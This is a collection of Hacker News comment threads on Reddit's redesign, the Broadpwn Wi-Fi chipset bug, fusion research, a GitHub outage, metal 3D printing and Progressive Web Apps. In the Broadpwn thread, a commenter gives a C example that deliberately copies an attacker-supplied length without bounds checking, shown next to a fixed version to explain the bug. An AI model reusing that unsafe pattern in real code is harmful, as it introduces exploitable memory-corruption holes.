For reference, I feel the reddit post is significantly better:


rocky1138 21 hours ago 1 reply      
A company as old as Reddit should be profitable.
mevile 21 hours ago 0 replies      
I think Reddit is on track to becoming hugely successful and completely irrelevant.
jumpkickhit 19 hours ago 0 replies      
That seems like a very low valuation for a site that's so heavily trafficked.

What is their average time-on-site statistic, I wonder? I'd expect it to be much higher than most other websites'.

idlewords 18 hours ago 3 replies      
Can anybody name a successful ground-up redesign of a popular website? Or a successful from-scratch rewrite of a heavily used codebase?
romanovcode 5 hours ago 0 replies      
>An early version of the new design, which we saw during our interview, looks similar to Facebook's News Feed or Twitter's Timeline: A never-ending feed of content broken up into cards with more visuals to lure people into the conversations hidden underneath.

So they are making the same mistakes as Digg. Interesting.

ErikVandeWater 18 hours ago 0 replies      
A lot of comments have dealt with the general idea of a redesign - but I haven't seen much on the specifics.

I would like to point out that the Twitter/Facebook feed style as described is difficult to replicate, because with Reddit, seeing the title of a post helps contextualize it so much. Without the title, many posts become meaningless because you can't guess which subreddit the post is from - and a meme/gif in one subreddit can mean something much different than a meme in another.

ThomPete 9 hours ago 0 replies      
I hope Reddit has a strategy for implementing that change gracefully and for dealing with the noisiest opponents. I have helped a lot of companies redesign their communities/forums/products. It's a serious minefield, as a lot of people will protest (but most will cope). Even small changes can throw people into revolution mode. And it's most often not the actual design that gets people complaining but the change itself. Going to be very interesting to see how this plays out.
scierama 20 hours ago 3 replies      
I don't get why a company that keeps the entire Internet talking on a daily basis is worth less than $2B, but a company that lets teens take snapshots and share them is worth many billions.
dcf_freak 6 hours ago 0 replies      
I don't know if this is commonplace, but I'm intrigued by these valuations. Anybody have a link to the actual valuation? What method was used?
neuigkeiten 5 hours ago 0 replies      
Wow, a complete redesign? Sounds dangerous. Why don't they make incremental changes and A/B-test the impact?
god_bless_texas 3 hours ago 0 replies      
Why does it take $200M to do these things?
zitterbewegung 20 hours ago 0 replies      
Others have commented that "they are doing a Digg" and asked what the new Reddit will be. The better question is: do you want to be the next site to replace Reddit? I don't think social news sites are sustainable at all. Reddit used to play the game of avoiding becoming Digg and keeping its user base happy. It didn't seem to be profitable, or profitable enough for their investors, so they are forced to broaden the user base by any means possible.
mark_l_watson 19 hours ago 0 replies      
When I talked with Alexis Ohanian (after his talk at Google), I asked him about the switch from Common Lisp years ago. I assume the rewrite will not be in CL! He is a very nice guy and his feelings for social responsibility came through nicely in his talk.

I find Reddit one of the most valuable web sites I use, covering news and tech interests. I wish them well on the infrastructure refresh.

lettergram 20 hours ago 0 replies      
Interesting. I'm super worried a redesign will kill the site.

However, at the same time (after thinking about it), I can see it as a necessary step.

Without a redesign it'll be hard for them to implement a way to make money. I assume, that is also how they increased the valuation; by promising increased profits.

free2rhyme214 10 hours ago 0 replies      
I'm way more interested if they create their own digital asset than the money they raised.
fasteddie 19 hours ago 0 replies      
I'm really curious what their cap table looks like at this point in time. With the various ownership rejiggerings by Conde Nast, and this round and Sam's last one, I wonder who has the power here.
toephu2 12 hours ago 0 replies      
Anyone know what Reddit's DAU is? This will help us give more context as to revenue potential.
DrScump 11 hours ago 0 replies      
I want Usenet newsgroups back.
rottyguy 21 hours ago 1 reply      
surprised the valuation is so low for a top 5 destination (per alexa).
pinaceae 20 hours ago 0 replies      
well, good news for the HN community!

start your engines, reddit will do what so many user-driven content sites have done - light themselves on fire. slashdot, digg, they never learn.

yes, the network effect is a huge moat. but then you actively alienate your users and then it goes FAST.

good luck to the aspiring entrepreneurs going after this opportunity.

don't even need a strong business plan, not like you can make any real money - but you'll get funding for years to come :)

dlwdlw 21 hours ago 0 replies      
Ugh, trying to fix marketing issues with more engineering....
throw2016 18 hours ago 0 replies      
I am not sure discussion sites like Slashdot and Reddit can run or scale as businesses and still retain credibility with the majority of their users.

As founder-run sites with income to sustain the site, it works, but the moment founders become 'distant' and obsessed with commercial objectives, the site sort of loses its focus and there is a slow decline.

Reddit only took off because it was seen as a low-key, non-commercial alternative to the 'over-commercial' Digg. Now it doesn't have that feel anymore, and this can only end badly.

Even HN is not a profit-making site, but it delivers value to Y Combinator beyond that.

payne92 20 hours ago 0 replies      
Is all of the money going to the company, or is some of it going to cash out existing shareholders?
ijafri 19 hours ago 1 reply      
Either you die young as Digg, or live long enough to become Reddit.
hydromet 5 hours ago 1 reply      
>> the company is literally re-writing all of its code

Wow.

Good to know they are "literally" re-writing code instead of "figuratively". Why is the adverb "literally" overused so often?

Entangled 11 hours ago 0 replies      
I came here to say something about Digg but there are already 70 references to Digg in the comments.
Remotely Compromising Android and iOS via a bug in Broadcom's WI-FI Chipsets exodusintel.com
386 points by pedro84  5 days ago   161 comments top 13
thomastjeffery 5 days ago 6 replies      
Why does Broadcom insist on proprietary drivers?

How could it possibly be detrimental for Broadcom to have free software drivers?

This article is a poignant example of how detrimental it is for them to continue to keep their drivers proprietary.

Animats 5 days ago 2 replies      
C's lack of array size info strikes again:

 memcpy(current_wmm_ie, ie->data, ie->len);
where "ie" points to data obtained from the net.
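The failure mode is easy to reproduce in miniature. Here is a hedged sketch (the buffer size, struct layout, and function names are my own illustrative assumptions, not Broadcom's actual code) showing why a length field taken straight off the air must be checked before the copy:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define WMM_IE_MAX 32  /* assumed size of the destination buffer */

/* An 802.11-style information element: a one-byte length field
 * followed by up to 255 bytes of attacker-controlled data. */
struct ie {
    uint8_t id;
    uint8_t len;        /* attacker-controlled */
    uint8_t data[255];
};

static uint8_t current_wmm_ie[WMM_IE_MAX];

/* Vulnerable pattern: ie->len can be up to 255, but the destination
 * holds only WMM_IE_MAX bytes, so this memcpy can overflow it. */
static void store_wmm_ie_unsafe(const struct ie *ie) {
    memcpy(current_wmm_ie, ie->data, ie->len);
}

/* Fixed: validate the untrusted length against the destination size. */
static int store_wmm_ie_safe(const struct ie *ie) {
    if (ie->len > sizeof current_wmm_ie)
        return -1;  /* reject the malformed element */
    memcpy(current_wmm_ie, ie->data, ie->len);
    return 0;
}
```

Since C arrays carry no runtime size information, every memcpy whose length comes from a parsed packet needs an explicit bound check like this.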

yifanlu 5 days ago 2 replies      
The article mentions

> Broadpwn is a fully remote attack against Broadcoms BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS.

But it doesn't go into any detail on how this privilege escalation actually works for iOS, and more specifically whether it requires additional exploits. Can anyone explain this in more detail? If this actually allows code execution on the iOS application processor, that means we have a jailbreak, right?

swerner 5 days ago 1 reply      
Fortunately, this is being addressed in software updates. Unfortunately, people who own older devices are left with the vulnerability forever. The iPhone 4S alone sold ~60 million units (according to Wikipedia) and did not (and most likely will not) receive any updates.
shock 5 days ago 6 replies      
This is kind of scary :(. How does one ensure that they aren't vulnerable to this bug?
nyolfen 5 days ago 0 replies      
I've been hearing people complain about the seriousness of this attack vector for years. I'd be surprised if there weren't intelligence agencies that have utilized it already.
samat 5 days ago 1 reply      
Could someone please explain: 1) is the firmware stored on the WiFi chip, or rather loaded during the boot process?

2) Do Apple/Google have a binary image from Broadcom, or rather the source code?

It is quite interesting how this patch production/delivery process works.

IshKebab 5 days ago 0 replies      
How long until someone unleashes this? There are going to be millions of vulnerable Android phones for at least a couple of years to come. Surely it will happen.
mangix 5 days ago 1 reply      
I do wonder why most mobile chips are Broadcom. There's decent competition from Qualcomm Atheros and MediaTek.
cpach 5 days ago 0 replies      
If anyone wonders, this was patched in iOS 10.3.3 https://threatpost.com/apple-patches-broadpwn-bug-in-ios-10-...
rca 5 days ago 0 replies      
http://boosterok.com/blog/broadpwn/ shows a simple check using hostapd to see if a device is vulnerable
amazingman 5 days ago 1 reply      
I already updated my phone. Is the iOS update that patches this available over a cell network? If not, as is usually the case, isn't that Not Good?
anon4728 5 days ago 0 replies      
Proprietary drivers, firmware blobs and ASICs are a national security threat. Without open code reviews, auditing and functional verification it's impossible to trust there are both a minimum of exploitable bugs and/or backdoors in a given software-hardware stack. This may require some sort of confidentiality rubric but there's no shortcut to getting around this vital need.
Google and a nuclear fusion company have developed a new algorithm theguardian.com
372 points by jonbaer  5 days ago   114 comments top 19
abefetterman 5 days ago 3 replies      
This is actually a really exciting development to me. (Note: what is exciting is the "optometrist algorithm" from the paper [1], not necessarily Google's involvement as pitched in the Guardian.) Typically a day of shots would need to be programmed out in advance, scanning over one dimension (out of hundreds) at a time. It would then take at least a week to analyze the results and create an updated research plan. The result is poor utilization of each experiment in optimizing performance. The 50% reduction in losses is a big deal for Tri Alpha.

I can see this being coupled with simulations as well, to understand sources of systematic error and create better simulations, which can then be used as a stronger source of truth for "offline" (computation-only) experiments.

The biggest challenge of course becomes interpreting the results. So you got better performance, what parameters really made a difference and why? But that is at least a more tractable problem than "how do we make this better in the first place?"

[1] http://www.nature.com/articles/s41598-017-06645-7

briankelly 5 days ago 4 replies      
From the actual journal article:

> Two additional complications arise because plasma fusion apparatuses are experimental and one-of-a-kind. First, the goodness metric for plasma is not fully established and objective: some amount of human judgement is required to assess an experiment. Second, the boundaries of safe operation are not fully understood: it would be easy for a fully-automated optimisation algorithm to propose settings that would damage the apparatus and set back progress by weeks or months.

> To increase the speed of learning and optimisation of plasma, we developed the Optometrist Algorithm. Just as in a visit to an optometrist, the algorithm offers a pair of choices to a human, and asks which one is preferable. Given the choice, the algorithm proceeds to offer another choice. While an optometrist asks a patient to choose between lens prescriptions based on clarity, our algorithm asks a human expert to choose between plasma settings based on experimental outcomes. The Optometrist Algorithm attempts to optimise a hidden utility model that the human experts may not be able to express explicitly.

I haven't read the full article nor do I understand the problem space, but the novelty seems overstated based on this. Maybe they can eventually collect metadata to automate the human intuition.

Edit: here's their formal description of it: https://www.nature.com/articles/s41598-017-06645-7/figures/2
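Reading the quoted description, the loop is essentially stochastic hill-climbing with a human as the comparison oracle. A minimal sketch (the perturbation scheme, step size, and all names are my guesses for illustration, not the authors' published method):

```c
#include <assert.h>
#include <stdlib.h>

#define N_SETTINGS 4   /* real devices have hundreds of knobs */

typedef double (*experiment_fn)(const double settings[N_SETTINGS]);
typedef int (*prefers_fn)(double candidate, double incumbent);

static double rand_uniform(double lo, double hi) {
    return lo + (hi - lo) * ((double)rand() / RAND_MAX);
}

/* Repeatedly offer a pair of settings: the incumbent best and a small
 * random perturbation. The human (not a hard-coded metric) decides
 * which "shot" was better; the winner becomes the new incumbent. */
void optometrist_search(double best[N_SETTINGS], experiment_fn run,
                        prefers_fn human_prefers, int n_iters, double step) {
    double best_outcome = run(best);
    for (int i = 0; i < n_iters; i++) {
        double candidate[N_SETTINGS];
        for (int j = 0; j < N_SETTINGS; j++) candidate[j] = best[j];
        /* Perturb one randomly chosen setting by a small fraction. */
        int k = rand() % N_SETTINGS;
        candidate[k] *= 1.0 + rand_uniform(-step, step);

        double outcome = run(candidate);
        if (human_prefers(outcome, best_outcome)) {
            for (int j = 0; j < N_SETTINGS; j++) best[j] = candidate[j];
            best_outcome = outcome;
        }
    }
}
```

In the real apparatus the "experiment" is a plasma shot and the "preference" is an expert eyeballing diagnostics; swapping those two callbacks in is the whole point of the design.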

dwaltrip 5 days ago 5 replies      
There was a talk about the state of nuclear fusion by some MIT folks linked here on HN a few days ago. One of the biggest takeaways was that many fusion efforts are very far away (3 to 6+ orders of magnitude) on the most important metric, Q, which is energy_out / energy_in. Additionally, much press and public discussion completely fail to discuss this and other core factors that actually matter for making fusion viable.

I remember Tri-alpha being listed on one of the slides near the bottom left of the plot, 4 or 5 orders of magnitude away from break even, where Q = 1 (someone please correct me if I'm remembering incorrectly).

Is the 50% improvement described in the article meaningful, as that would only be a fraction of an order of magnitude?

I understand the broader concept of combining experts and specialized software on complex problems is a powerful idea -- I'm just wondering if this specific result actually changes the game for Tri-alpha.
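Taking the figures in this comment at face value, the question has a quick back-of-envelope answer, since a multiplicative gain translates to log10 of that factor in orders of magnitude:

```python
import math

# Gap to break-even (Q = 1), per the parent comment's recollection:
gap_orders = 4           # orders of magnitude below Q = 1
improvement = 1.5        # a 50% improvement multiplies Q by 1.5

# How much of one order of magnitude is a 1.5x gain?
orders_gained = math.log10(improvement)    # ~0.176 of an order

# How many consecutive 50% improvements to close a 4-order gap?
steps_needed = gap_orders / orders_gained  # ~22.7
```

So a single 50% gain covers roughly a sixth of one order of magnitude; closing a four-order gap would take on the order of twenty such improvements, compounded.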

EternalData 5 days ago 5 replies      
Google might try to become the conglomerate of all forward-facing things, but it is somewhat funny to see how, through it all, it's their advertising revenues that form the core of the business.
ZenoArrow 5 days ago 0 replies      
Sounds like some promising results, hopefully this approach will continue to be useful.

Addressing the wider article, it always surprises me that the focus fusion approach is never mentioned in fusion articles put out by the mainstream media. I don't know what to attribute that to, but it's surprising that one of the most promising fusion approaches is constantly overlooked.

To give an idea how drastically overlooked focus fusion is, here's a graph showing R&D budgets for different fusion projects...


... and here's a graph showing energy efficiency of fusion devices (running on deuterium I believe)...


You'd think that the second most efficient device would've gotten more than $5 million in funding over 20 years (I think the original funding was from NASA back in 1994).

mtgx 5 days ago 1 reply      
I think their universal quantum computer (to be announced later this year) could accelerate fusion research even more, as I imagine it could more accurately simulate the atomic reactions and experiments. Practical quantum computers may just be what we were missing to finally be able to build working fusion reactors.

The millions of possible "solutions" and algorithms for working fusion reactors may be what has made fusion research so expensive and fusion reactors seem so far away. Quantum computers may be able to cut right through that hard problem, although we may have to wait a bit more until quantum computers are useful enough to make an impact on fusion research. I don't know if that's reaching 1,000 qubits or 1 million qubits.

yousefvi 5 days ago 0 replies      
As a psychologist, this looks an awful lot like computerized adaptive testing methods, only instead of estimating some parameter vector about a person, you're estimating some parameter vector about plasma.

Even the title "optometrist algorithm" is telling, because that paradigm is a basic model for how a lot of testing is done, except that it's not the optometrist doing it, it's a computer.

DrNuke 5 days ago 0 replies      
Diversification of the business, me thinks... nuclear is so big (but slow) that a penny invested today may become a tenner tomorrow, just in case.
siscia 5 days ago 7 replies      
I do have a naive question.

Suppose a big breakthrough comes out of a private company, and such an innovation is necessary to make nuclear fusion work.

Will the company be free to do whatever it pleases with the technology, or will it somehow be "forced" to let others use it, maybe in exchange for some royalties?

rurban 5 days ago 0 replies      
No, they have not. They developed a very useful new program.

But simple assisted hill climbing is not a new algorithm, you might call it "Wizard" though. This would attract the right audience.

janemanos 5 days ago 0 replies      
Maybe I'll see commercial fusion within my lifetime... how nice is that!
j7ake 5 days ago 1 reply      
How does this nuclear fusion company hope to make money? Their product is decades in the future.
suzzer99 5 days ago 4 replies      
Am I the only one that never reads these articles but just goes straight to the comments? It seems like reporters always get the facts bungled and go for the simple story - out of necessity of course.
JohnJamesRambo 5 days ago 1 reply      
Google didn't enter the race. They helped a company with some calculations.
Necromant2005 5 days ago 0 replies      
It's nothing. Even if Google has invented something, we will never see a product customers can purchase.
grnadav1 5 days ago 1 reply      
You just KNOW Elon Musk is gonna beat 'em to it ;)
MrQuincle 5 days ago 4 replies      
There are two directions within the energy world that I don't completely get. One of them is hydrogen storage, the other nuclear fusion.

From what I always understood is that the high-energy neutrons produced by the fusion reaction irradiate the surrounding structure and that there is still considerable nuclear waste (although lifetimes are better than with nuclear fission). Do the scientists not care or is this outdated info?

hailmike 5 days ago 0 replies      
I want to start placing "Google and " before stating my accomplishments.

"Google and a nuclear fusion company have developed a new algorithm"

sounds way better than:

"Nuclear fusion company has developed a new algorithm using Google"

They may not mean the same, but in today's world faking it until you make it might pay off.

quickben 5 days ago 3 replies      
Outside of the title being misleading, I'm sceptical. It's one thing to have the hardware for research, and quite another to have the expertise for the research.

Google entered self-driving car research, and we have yet to see the cars driven around.

This heavily reminds me of Intel and their diversification, up until recently, they were in IoT, makers market and what not. One solid push from AMD and they jumped out of everything way too fast to track.

Google seems the same with nuclear fusion. They have the advertising money to throw around, but that's just it: they are in a different segment, and from an investing side I'm more inclined to stay away from their stock than buy it.

GitHub was down github.com
391 points by thepumpkin1979  22 hours ago   227 comments top 31
kaikai 22 hours ago 5 replies      
I would love to see a chart of traffic to other sites when GitHub goes down. My bet is that HackerNews and Twitter both get significant spikes from all those bored developers.
alexchamberlain 21 hours ago 0 replies      
When I break our GitHub webhooks, I joke it's time for people to practice our Disaster Recovery (DR) procedures. In all seriousness, this is a good opportunity to practice work without GitHub. Any service can go down; can you deploy a critical bug fix without it? If not, why not and what can you do to fix it?
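One concrete drill along these lines is keeping a mirror remote you can clone, fetch, and deploy from while the primary host is down. A sketch driving plain git commands from Python; the "backup" remote name and URL are placeholders:

```python
import subprocess

def run_git(repo, *args):
    # Thin wrapper so failures surface immediately as exceptions.
    return subprocess.run(["git", *args], cwd=repo, check=True,
                          capture_output=True, text=True).stdout

def sync_backup(repo, backup_url, remote="backup"):
    """Ensure a fallback remote exists and mirror all refs to it."""
    remotes = run_git(repo, "remote").split()
    if remote not in remotes:
        run_git(repo, "remote", "add", remote, backup_url)
    # --mirror pushes every branch and tag, so the backup can stand in
    # for origin while the primary host is unavailable.
    run_git(repo, "push", "--mirror", remote)
```

Run on a schedule (or as a post-push hook), this keeps the fallback close enough to current that a critical fix can ship without the primary host.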
kmfrk 22 hours ago 3 replies      
I had to change a username from capitalized to uncapitalized and use my updated remote afterwards, apologies if I broke it for everyone.
_Marak_ 19 hours ago 2 replies      
If anyone is interested, I've been working with a git host that is actually distributed across a p2p network using SSB.

It's been working fairly well so far. We are using git-ssb to manage a few projects instead of putting them into Github.

slap_shot 22 hours ago 1 reply      
Status now shows Major Service Outage:

12:32 EDT: Major service outage.


luhn 22 hours ago 4 replies      
Pages Builds Failure Rate spiked to over 2000%. I don't know how that's possible, but it seems pretty bad.
relaxitup 19 hours ago 1 reply      
Do these general Github outages affect GH Pages as well, or is that service portion segmented to some degree?
rcthompson 21 hours ago 1 reply      
Looking at the status graphs, it seems like there was some clearly anomalous data starting around midnight, about 9 hours before the actual outage "began". Maybe a gradual botnet ramp-up, and 9:27 AM is when it got bad enough to overload some critical service? (Or really any other threshold-based failure scenario.)
sashk 22 hours ago 1 reply      
What was happening to Github for a week or so in late June - early July? I see "The status is still red at the beginning of the day" for a whole week.


tambourine_man 21 hours ago 6 replies      
Insert remark on why we use a centralized service for a distributed source control system, etc. No one seems to care, unfortunately
leesalminen 22 hours ago 0 replies      
I think it started as minor as I was receiving a unicorn once per 10 pages. It's currently happening on almost all.

Of course, I'm trying to dig into a WebKit issue and need the issues to load!

pmoriarty 20 hours ago 6 replies      
Where is github hosted?

Do they use AWS or another commercial cloud provider, or do they have their own servers in data centers (hopefully scattered around the globe)?

If AWS, are their services spread among multiple availability zones? I'm just wondering how this could happen.

pramodzion 21 hours ago 0 replies      
Github is back online.
Cafey 22 hours ago 0 replies      
It has leveled up to a major outage!
AlphaWeaver 18 hours ago 2 replies      
I saw a comment earlier mentioning that GitHub allegedly doesn't release post mortems publicly? If this is true, that's upsetting.
loomer 21 hours ago 0 replies      
Anyone have any knowledge of what specifically happened?
ibgib 22 hours ago 1 reply      
Are there any other major sites that are down?
DevKoala 19 hours ago 0 replies      
This is happening too frequently now.
vishesh92 22 hours ago 0 replies      
It just became a major service outage.
Osiris 22 hours ago 0 replies      
It's starting to work again for me. I was able to approve a PR and merge it.
xxkylexx 22 hours ago 1 reply      
Looks like I am still able to push to/pull from my repos without issue.
yellowapple 21 hours ago 0 replies      
My apologies. I knew my Perl 6 wrapper for GLFW was bad, but never realized it'd be so bad that GitHub would choke to death on it.
peterwwillis 22 hours ago 1 reply      
Dang. It's too bad their customers' source control files aren't distributed and decentralized, or they could keep working and ignore this.
macawfish 21 hours ago 0 replies      
Whatever happened to gittorrent?
GrumpyNl 22 hours ago 1 reply      
How does this affects all your dependencies?
tevonsb 22 hours ago 6 replies      
Thoughts on the cause?
adtac 22 hours ago 0 replies      
>GitHub is having a minor service outage

It's definitely not minor.

moomin 22 hours ago 0 replies      
I knew I shouldn't have released the new version of my project yesterday. :p

Sorry everyone

ProAm 22 hours ago 8 replies      
GitHub's uptime is pretty bad. Isn't it under 95% for the year now?
__s 22 hours ago 0 replies      
In the face of a lack of information, HN comments begin to throw around unfounded speculation & tongue-in-cheek jokes run rampant. I suppose that in the absence of information, many stay silent, & the remaining see a thread lacking comments

& now we've got this meta one in the mix

0xbear 22 hours ago 3 replies      
How many more can we expect before they develop appreciation for testing _before_ they push to prod?
3D metal printing is about to go mainstream newatlas.com
370 points by phr4ts  1 day ago   156 comments top 35
Animats 20 hours ago 4 replies      
There are many services printing metal parts. Shapeways has been doing it since 2009. There are several workable processes. [1][2] This new machine competes with the ExOne Innovent.[3] That uses a single-step process (no oven needed) but is slower.

Desktop Metal's big claim is that they can lay down "up to" 8200 cm³/hr of metal. The "up to" weasel words are a problem. They're vague about the layer thickness. 3D printing has a basic trade-off between speed and precision. Most of the commercial vendors go for high enough precision that you can make working parts. Desktop Metal doesn't offer many pictures of their finished parts, but I did find one.[4] That looks like it was made with layers of about 0.5mm. The furnace step provides some surface smoothing. That's not bad for casting.

It's nice, but it's not clear that it's 100x, or even 10x, better than the competition.

[1] https://www.youtube.com/watch?v=rEfdO4p4SFc
[2] https://www.youtube.com/watch?v=2vsaSzrhvcw
[3] http://www.exone.com/Systems/Research-Education-Printers/Inn...
[4] https://embedwistia-a.akamaihd.net/deliveries/5c8aec78d82aa1...

chroem- 16 hours ago 4 replies      
It's like the brogrammer world just discovered powder metallurgy.

This exact technology has existed for decades but hasn't seen widespread use because it has serious problems. I don't see any evidence that Desktop Metal solved these issues either. The resulting parts have high shrinkage, poor dimensional tolerance, and poor mechanical properties. The sintering process leaves voids inside the material that serve as stress concentrations, causing the material to fail well below its rated strength. Also sintered parts tend to fail catastrophically rather than yielding since the adhesion between particles is much weaker than the yield strength of the metal.

nealrs 32 minutes ago 0 replies      
It's been about 10 years since I left Caterpillar --- but I don't think you can weld (reliably) on PM / sintered parts. This was one of the concerns the crotchety old manufacturing engineers brought up when I proposed replacing some expensive machined bosses with a much cheaper PM part.

Then again, those guys really loved to say stuff like "no, that's not how it's done." - so maybe they're wrong / tech has improved significantly.

ph0rque 22 hours ago 9 replies      
$120k for the prototype printer, $360k for the production printer... still about two orders of magnitude away from being practical for me to set up a microfactory in my garage. Maybe by the time my car is self-driving and earning me money instead of sitting in my garage, I can get that microfactory set up affordably.
coredog64 23 hours ago 3 replies      
> The company has raised a ton of money in the last few months...

> ...Desktop Metal's Studio machines are also a ton more practical to have in an office.

> But there's a ton of metal options...

I'm guilty of this too, but I think there are more ways to describe a plethora of items than "a ton". Unless, of course, there are actually 2000lbs worth.

sevensor 20 hours ago 2 replies      
I don't think they make enough of this point:

> Depending on the nature of the part, it might be necessary to do some post-print surface finishing like sanding or bead blasting to smooth out the layered surfaces

If this is anything like the powder-bed parts I've handled, the layers are going to be pretty rough. I wouldn't be surprised if they need some degree of post-machining. Don't sell your CNC mill just yet.

Furthermore, 15% shrinkage during sintering? What's the dimensional tolerance on the finished part then? I'm guessing it's not great.
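To make the tolerance worry concrete: with ~15% linear shrinkage, the printed "green" part has to be scaled up by 1/(1 - 0.15), and any drift in the actual shrinkage rate shows up directly as dimensional error. Illustrative numbers only:

```python
# Nominal linear shrinkage during sintering (from the parent comment).
shrinkage = 0.15

# To land on the target dimension, the "green" printed part must be
# scaled up by 1 / (1 - shrinkage).
def green_size(target_mm, shrink=shrinkage):
    return target_mm / (1.0 - shrink)

# Sensitivity: if actual shrinkage wanders by +/- 0.5 percentage points,
# how far off does a 100 mm target dimension end up?
target = 100.0
green = green_size(target)                  # ~117.6 mm as printed
low = green * (1.0 - (shrinkage - 0.005))   # shrinks less than planned
high = green * (1.0 - (shrinkage + 0.005))  # shrinks more than planned
error_mm = (low - high) / 2.0               # roughly +/- 0.6 mm
```

A half-point of shrinkage variation costs about 0.6 mm on a 100 mm feature, which is far looser than typical machining tolerances and supports the guess that finished-part tolerance "is not great" without post-machining.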

50something 21 hours ago 1 reply      
This is another Ric Fulop company, notoriously the founder of A123 Systems [1]. That company also raised "a ton" of money but ultimately blew up, filing for bankruptcy. I'm skeptical of this new endeavor because of both economics and technology.

[1] https://en.wikipedia.org/wiki/A123_Systems

simias 17 hours ago 0 replies      
From the video:

The production system is cloud-connected

Seriously, that's a selling point nowadays? I have to buy a hyper expensive piece of hardware and if the company goes under I might not even be able to use it anymore?

Not everything needs to be on a bloody cloud.

1024core 22 hours ago 2 replies      
What is the strength of such a part, compared to a regular cast part? Say I 3-D print a spanner. How well will it hold up against a spanner that was cast and heat treated?
biggerfisch 22 hours ago 1 reply      
> but the only affordable printing materials are cheap ABS plastics

Not very true at all. You can get PLA for $20/1kg or less. Even resin for SLA printers is often possible to find for affordable prices, especially considering that you can sometimes use less material without the need for infill.

I'm really not even sold on the idea that so many people "need" metal printers. Seems like most people would be way better off with the incredibly cheaper plastic options.

WhitneyLand 22 hours ago 0 replies      
Any reason not to set default skepticism to high for Loz Blain and NewAtlas?

>...it's going to compete with traditional mass manufacturing

>...the hype is real

The team, tech, results, deals already signed, all seem really impressive in their own right. No hyperbole needed to get a more views.

It's not my area, if someone tells me this really has a shot at competing with mass manufacturing in the next 5 years I retract everything.

rrggrr 22 hours ago 1 reply      
I'm told the metal powders are still more expensive than equivalent traditional materials, and that in some cases (Ti) can be explosive. Anyone know what the real economics are in terms of materials and energy costs?
kutkloon7 18 hours ago 0 replies      
As a layman, I am skeptical. This is very similar to the promises that were made regarding 3d printing of other materials, and those weren't quite fulfilled.

Like many hyped new techniques, they end up as techniques that are almost good enough to be practical.

WalterBright 18 hours ago 0 replies      
A forging is 3x the strength of a casting of the same part from the same material. That's why when upgrading the power of your muscle car, forged parts are the way to go.

What's the relative strength of 3D printing?

QAPereo 22 hours ago 3 replies      
Other than the temperature a relatively compact oven is potentially reaching, what's the breakthrough here other than the successful funding?
plasticchris 22 hours ago 1 reply      
4 furnaces per printer... reminds me of factorio
Dowwie 21 hours ago 2 replies      
I've watched a few DIY foundry videos on YouTube where makers melt down aluminum cans and scrap metal into chunks of metal, ready for re-use. I wonder if these 3d printers will be able to use reclaimed metal created from a similar type of process.
edanm 18 hours ago 0 replies      
While (potentially) impressive, it's not clear to me that this will really replace production. I mean, it's faster than other printers, but still far away from regular production speeds.
Glyptodon 21 hours ago 1 reply      
Printing with improved PMC (which is what this sounds like) doesn't seem that revolutionary to me... I know there was a Kickstarter a while back for metal-based PMC-like filament to use in regular 3-D printers (for kiln firing later), and I think somebody already makes a device to print using PMC itself. While doing so precisely, strongly, and cleanly enough for mechanical applications, and with a much broader spectrum of metals, is great, the prices seem rather far from the headline hype. (Not that the current options I mentioned don't leave much to be desired.)
achow 22 hours ago 1 reply      
> Each production printer can produce up to an incredible 500 cubic inches of complex parts per hour.

That is 124 iPhone 6 sized solid blocks per hour. Incredible indeed!
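The arithmetic roughly checks out; a quick sanity check using approximate iPhone 6 dimensions (the small gap from the comment's 124 comes from the assumed phone envelope):

```python
# 500 cubic inches per hour in metric:
IN3_TO_CM3 = 2.54 ** 3                   # 16.387 cm^3 per cubic inch
rate_cm3 = 500 * IN3_TO_CM3              # ~8194 cm^3/hr

# iPhone 6 envelope, roughly 138.1 x 67.0 x 6.9 mm:
iphone_cm3 = 13.81 * 6.70 * 0.69         # ~63.8 cm^3

blocks_per_hour = rate_cm3 / iphone_cm3  # ~128
```

This also matches the ~8200 cm³/hr figure quoted elsewhere in the thread for Desktop Metal's claimed production rate.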

zdmc 22 hours ago 1 reply      
In case anyone else was wondering about the power requirement for the sintering furnace: 208V 3-phase, 30A. The 3-phase requirement may be an impediment to some hobbyists; they should probably offer it with a buying option of their own branded phase converter.
smnplk 21 hours ago 1 reply      
But could it print a CNC machine?
alvern 21 hours ago 0 replies      
This may bring the per part costs closer to what prototyping costs come in at for CNC machining or Metal Injection Molding.

I don't see this being used with a lot of exotic materials yet, but for stainless steel this is great.

visarga 22 hours ago 3 replies      
Doesn't oven treatment induce slight deformations?
Iv 13 hours ago 0 replies      
The game will radically change when metal printing arrives at the point where it can print coils and make stators and rotors.

Wake me up when metal printing reaches that point.

tintan 11 hours ago 0 replies      
What advantage does metal printing offer over casting a 3d printed wax/resin?
bandrami 16 hours ago 0 replies      
So, about those good manufacturing jobs...
sharemywin 22 hours ago 2 replies      
How does this compare to a metal CNC machine? Cost and Speed?
pier25 13 hours ago 1 reply      
So now anyone will be able to print a real gun with complete anonymity.
steveklabnik 22 hours ago 0 replies      
I don't know much about how Desktop Metal works; how does this compare to things like ExOne?
jkoll 16 hours ago 0 replies      
Is this an ad?
microcolonel 14 hours ago 0 replies      
The idea of an "office-friendly sintering furnace" would have been comedy a decade ago.
pluio 16 hours ago 0 replies      
nmyk 22 hours ago 0 replies      
Guns for everyone!
HugoDaniel 17 hours ago 0 replies      
Apple's refusal to support Progressive Web Apps is a detriment to the web medium.com
370 points by jaffathecake  5 days ago   440 comments top 48
christiangenco 5 days ago 17 replies      
I think a lot of commenters here are missing the point and getting distracted by push notifications (who wants a website spamming them with notifications?) and loading screens (hardly a feature).

Apple supporting PWA (Progressive Web Apps) is hugely important because it enables a future where web apps can natively support browser, Mac/Windows/Linux desktop, and mobile iPhone/Android/Windows native mobile with a single codebase of open technologies.

Why is that important? By fragmenting development effort, the overall product isn't as good on any platform.

There's an app I'm making on the side to keep track of your contacts (like a personal customer management system). This needs to store all your contacts offline, because it'd be too much friction to load everyone you've ever taken notes on over the network every time you open the app.

Right now, the only way for me to accomplish that on iOS is to make a native app. This means I had to learn an entirely new technology stack (React Native and XCode), completely rewrite my views, tie everything into my backend, and go through Apple's Byzantine approval process (which I still haven't done because I can't figure out why my app compiles and runs locally but complains about libraries not being linked when I try to archive it to upload to the app store).

This is unnecessary duplication of work that could've been spent writing new features, makes it harder to add new front-end features in the future (because now they have to be added in two places), and adds a huge lag in the time it takes me to push changes to the iOS client (weeks, vs. the seconds it takes to push a change to the web client).

